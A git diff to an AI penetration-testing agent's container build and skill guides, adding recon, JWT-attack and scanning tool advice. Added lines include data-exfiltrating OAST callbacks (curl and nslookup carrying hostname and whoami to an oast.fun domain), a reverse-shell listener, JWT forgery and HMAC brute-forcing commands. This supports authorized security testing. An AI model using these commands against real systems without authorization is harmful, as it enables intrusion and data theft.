diff --git a/containers/Dockerfile b/containers/Dockerfile index 51d5753..16c1c54 100644 --- a/containers/Dockerfile +++ b/containers/Dockerfile @@ -75,7 +75,7 @@ RUN nuclei -update-templates RUN pipx install arjun && \ pipx install dirsearch && \ - pipx inject dirsearch setuptools && \ + pipx inject dirsearch 'setuptools<81' && \ pipx install wafw00f ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global @@ -193,7 +193,11 @@ USER pentester RUN python3 -m venv /app/.venv && \ /app/.venv/bin/pip install --no-cache-dir caido-sdk-client && \ /app/.venv/bin/pip install --no-cache-dir -r /home/pentester/tools/jwt_tool/requirements.txt && \ - ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool + printf '%s\n' \ + '#!/bin/bash' \ + 'exec /app/.venv/bin/python /home/pentester/tools/jwt_tool/jwt_tool.py "$@"' \ + > /home/pentester/.local/bin/jwt_tool && \ + chmod +x /home/pentester/.local/bin/jwt_tool COPY --chown=pentester:pentester strix/tools/proxy/caido_api.py /opt/strix-python/caido_api.py ENV PYTHONPATH=/opt/strix-python diff --git a/strix/skills/custom/source_aware_sast.md b/strix/skills/custom/source_aware_sast.md index 6b4f4d2..329aa79 100644 --- a/strix/skills/custom/source_aware_sast.md +++ b/strix/skills/custom/source_aware_sast.md @@ -121,6 +121,23 @@ trivy fs --scanners vuln,misconfig --timeout 30m --offline-scan \ --format json --output /workspace/.strix-source-aware/trivy-fs.json . || true ``` +## JavaScript-Side Coverage + +For frontends and Node services, layer these on top of the language-agnostic +passes above: + +```bash +retire --path . --outputformat json --outputpath /workspace/.strix-source-aware/retire.json || true +eslint --no-config-lookup --rule '{"no-eval":2,"no-implied-eval":2}' \ + -f json -o /workspace/.strix-source-aware/eslint.json . || true +``` + +When you hit a minified bundle, run `js-beautify ` for a readable +view before greppping — and use `jshint --reporter=unix ` as a +lighter syntax/anti-pattern check when ESLint is over-eager. The +`JS-Snooper` / `jsniper.sh` tools (in `katana.md`) are the right next +step to mine those bundles for endpoint candidates. + ## Converting Static Signals Into Exploits 1. Rank candidates by impact and exploitability. diff --git a/strix/skills/scan_modes/deep.md b/strix/skills/scan_modes/deep.md index caa1799..62e02bb 100644 --- a/strix/skills/scan_modes/deep.md +++ b/strix/skills/scan_modes/deep.md @@ -30,6 +30,8 @@ Thorough understanding before exploitation. Test every parameter, every endpoint - Review file handling: upload, download, processing - Understand the deployment model and infrastructure assumptions - Check all dependency versions and repository risks against CVE/misconfiguration data +- For quick CVE lookups on a named product/version, use `vulnx search ` + (ProjectDiscovery's CVE database) before falling back to web_search **Blackbox (no source)** - Exhaustive subdomain enumeration with multiple sources and tools diff --git a/strix/skills/tooling/ffuf.md b/strix/skills/tooling/ffuf.md index 0c4d1f0..aa44b4c 100644 --- a/strix/skills/tooling/ffuf.md +++ b/strix/skills/tooling/ffuf.md @@ -64,3 +64,9 @@ Failure recovery: If uncertain, query web_search with: `site:github.com/ffuf/ffuf README` + +Alternate tool for path/file enumeration: `dirsearch -u -e php,html,js,json` +ships with curated wordlists, sane defaults, and built-in recursion. Reach +for ffuf when you need surgical fuzzing of any input position (header, +body, vhost) or precise filter control; reach for dirsearch for a quick +broad sweep with no setup. diff --git a/strix/skills/tooling/httpx.md b/strix/skills/tooling/httpx.md index 50fcf53..408d84b 100644 --- a/strix/skills/tooling/httpx.md +++ b/strix/skills/tooling/httpx.md @@ -75,3 +75,8 @@ Failure recovery: If uncertain, query web_search with: `site:docs.projectdiscovery.io httpx usage` + +Companion: `wafw00f ` fingerprints the WAF/CDN in front of a target +(Cloudflare, Akamai, AWS WAF, etc.). Run it once after httpx confirms the +host is live — the WAF identity decides whether to throttle fuzzing, +swap to evasion payload sets, or assume blocking and route differently. diff --git a/strix/skills/tooling/katana.md b/strix/skills/tooling/katana.md index 258e8e0..82ed6eb 100644 --- a/strix/skills/tooling/katana.md +++ b/strix/skills/tooling/katana.md @@ -74,3 +74,14 @@ Failure recovery: If uncertain, query web_search with: `site:docs.projectdiscovery.io katana usage` + +Complementary crawlers / JS endpoint extractors in the sandbox: +- `gospider -s https://target.tld -d 3 -c 10 -t 20` — alternate crawler; + picks up things Katana misses on weird sites; use it as a second + pass when Katana output looks thin. +- `~/tools/JS-Snooper/js_snooper.sh ` and + `~/tools/jsniper.sh/jsniper.sh ` — both take a bare domain and + run their own JS-file discovery internally (jsniper drives httpx + + katana + nuclei file templates). Reach for them when you want a quick + "find endpoints/keys/secrets in any JS this domain serves" sweep + without wiring it up yourself. diff --git a/strix/skills/tooling/python.md b/strix/skills/tooling/python.md index 124de8f..65ab1cf 100644 --- a/strix/skills/tooling/python.md +++ b/strix/skills/tooling/python.md @@ -88,3 +88,13 @@ For iterative exploit work, put code in a file: 2. Run it with `exec_command`: `python3 /workspace/scratch/exploit.py`. 3. Edit and rerun until the proof-of-concept is reliable. ``` + +## Installing extra packages + +The sandbox's Python lives in `/app/.venv`. To add a one-off dependency +for an exploit script, use `uv` (already in the image and much faster +than pip): + +```bash +uv pip install --python /app/.venv/bin/python +``` diff --git a/strix/skills/vulnerabilities/authentication_jwt.md b/strix/skills/vulnerabilities/authentication_jwt.md index ae84064..4458b1b 100644 --- a/strix/skills/vulnerabilities/authentication_jwt.md +++ b/strix/skills/vulnerabilities/authentication_jwt.md @@ -151,6 +151,16 @@ JWT/OIDC failures often enable token forgery, token confusion, cross-service acc 9. Favor minimal PoCs that clearly show cross-context acceptance and durable access 10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each +## Tooling + +- `jwt_tool -t -rh "Authorization: Bearer " -M at` runs the + full attack matrix (alg=none, RS→HS confusion, kid injection, claim + edits) and reports which mutations the server still accepts. +- `jwt_tool -C -d ` brute-forces HMAC secrets when an + HS-family signature is in use. +- Use `jwt_tool` to mint a token under a key you control once you find an + acceptance path (kid/jku/x5u/jwk), then replay via `repeat_request`. + ## Summary Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion. diff --git a/strix/skills/vulnerabilities/idor.md b/strix/skills/vulnerabilities/idor.md index 03de216..2031340 100644 --- a/strix/skills/vulnerabilities/idor.md +++ b/strix/skills/vulnerabilities/idor.md @@ -47,6 +47,9 @@ Object-level authorization failures (BOLA/IDOR) lead to cross-account data expos **Parameter Analysis** - Pagination/cursors: `page[offset]`, `page[limit]`, `cursor`, `nextPageToken` (often reveal or accept cross-tenant/state) - Directory/list endpoints as seeders: search/list/suggest/export often leak object IDs for secondary exploitation +- Find undocumented params with `arjun -u ` (GET) or `arjun -u -m POST` — + surfaces hidden filters like `?include_deleted=1`, `?as_user=…`, `?owner_id=…` + that frequently widen the IDOR surface. **Enumeration Techniques** - Alternate types: `{"id":123}` vs `{"id":"123"}`, arrays vs scalars, objects vs scalars diff --git a/strix/skills/vulnerabilities/rce.md b/strix/skills/vulnerabilities/rce.md index 1bcd540..aa9c815 100644 --- a/strix/skills/vulnerabilities/rce.md +++ b/strix/skills/vulnerabilities/rce.md @@ -41,14 +41,18 @@ Remote code execution leads to full server control when input reaches code execu ### OAST +Use `interactsh-client -v` in the sandbox to mint a unique callback +domain (`*.oast.fun`); substitute it for `attacker.tld` below. Each +invocation prints inbound DNS/HTTP hits to stdout in real time. + **DNS** ```bash -nslookup $(whoami).x.attacker.tld +nslookup $(whoami).xyz.oast.fun ``` **HTTP** ```bash -curl https://attacker.tld/$(hostname) +curl https://xyz.oast.fun/$(hostname) ``` ### Output-Based @@ -233,6 +237,13 @@ pop graphic-context 6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies 7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops +## Tooling + +- Reverse-shell listener: `ncat -lvnp 4444` (in the sandbox; `ncat` is the + netcat variant that ships in the image). Pair with a one-shot shell + payload only when OAST + selective reads are insufficient — never + drop a persistent shell when a single targeted command will prove it. + ## Summary RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path. diff --git a/strix/skills/vulnerabilities/ssrf.md b/strix/skills/vulnerabilities/ssrf.md index e3570d7..17f407a 100644 --- a/strix/skills/vulnerabilities/ssrf.md +++ b/strix/skills/vulnerabilities/ssrf.md @@ -123,7 +123,11 @@ Server-Side Request Forgery enables the server to reach networks and services th ## Blind SSRF -- Use OAST (DNS/HTTP) to confirm egress +- Use OAST (DNS/HTTP) to confirm egress. `interactsh-client -v` (running + in the sandbox) gives you a unique `*.oast.fun` domain; embed it in + the URL parameter and watch the interactsh stdout for the inbound + DNS/HTTP hit. Each invocation yields a fresh domain — restart between + payloads if you need to correlate hits to a specific request. - Derive internal reachability from timing, response size, TLS errors, and ETag differences - Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs) diff --git a/strix/skills/vulnerabilities/xxe.md b/strix/skills/vulnerabilities/xxe.md index cb9183f..2f01435 100644 --- a/strix/skills/vulnerabilities/xxe.md +++ b/strix/skills/vulnerabilities/xxe.md @@ -49,6 +49,9 @@ XML External Entity injection is a parser-level failure that enables local file - Blind XXE via parameter entities and external DTDs; confirm with DNS/HTTP callbacks - Encode data into request paths/parameters to exfiltrate small secrets (hostnames, tokens) +- Use `interactsh-client -v` for the callback domain. Reference it as the + external DTD host (e.g. ``) + and read the DNS/HTTP hit on the interactsh stdout. ### Timing